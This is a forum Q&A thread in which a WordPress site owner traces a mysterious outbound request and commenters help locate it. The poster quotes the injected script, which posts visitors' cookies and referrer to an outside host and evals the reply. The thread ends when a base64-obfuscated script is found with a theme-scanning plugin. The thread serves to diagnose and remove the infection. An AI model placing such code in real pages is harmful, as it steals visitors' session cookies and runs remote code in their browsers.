# Tracing a strange get http request to a random server

Tags: javascript, php, wordpress, http, get

I have a WordPress site up and have seen that it is sending a HTTP request to a strange server and I am not sure why or what part of my website is making the request. From a firebug trace, it seems its a JavaScript request.

site [here](http://siliconyaba.com)

Thanks Guys

Cristik/Dimitri, the request goes to:'http://com-nv.us/script.js?56174' the 56174 value changes and the request is sent everytime the page is loaded.
How would I do a grep search to find what is being sent?

@Dandavis
I never put any scripts on and it slows down the website. Is there a way to trace and control this?

```js
jq = jq.noConflict();
jq.post('http://com-nv.us/script.js?56174', {
    referrer: document.referrer,
    cookies: document.cookie
}, function (dat) {
    jq(function () {
        jq('body').show();
        eval(dat);
    });
}, 'text');
```

Comment: What's the site it makes requests to, what does it send? And when does the request is made, e.g. when accessing all pages or admin only, or in other pages?

Comment: do a grep search on that site's name on source code. most of the time it is just update checks, and NSA stuff.

Comment: it's just one of those scripts that sniffs the page the visitor came from and POSTs it off to some server you don't control on the same url the script came from... is that something you want to happen?

Comment: So you know what the JavaScript looks like but aren't sure where it's coming from in your PHP? You could try the [TAC plugin](https://wordpress.org/plugins/tac/) which scans your themes for things like this - there was another one I've used too but I forget which. It's probably deliberately obfuscated in base64 code or something. It might also be worth changing themes to see if it still happens, switching off half of your plugins to see if it still happens, etc.

Comment: Thanks Cristik, Dimitri, & dandavis,  see the updated info. Rup - Yes, I see the javascript but I don't know where it is, but i'll try that plugin. Is there a manual way to trace it?

Comment: Hi @Rup, You were right, it was a base64 script and I used the TAC plugin to find it. Thanks for the help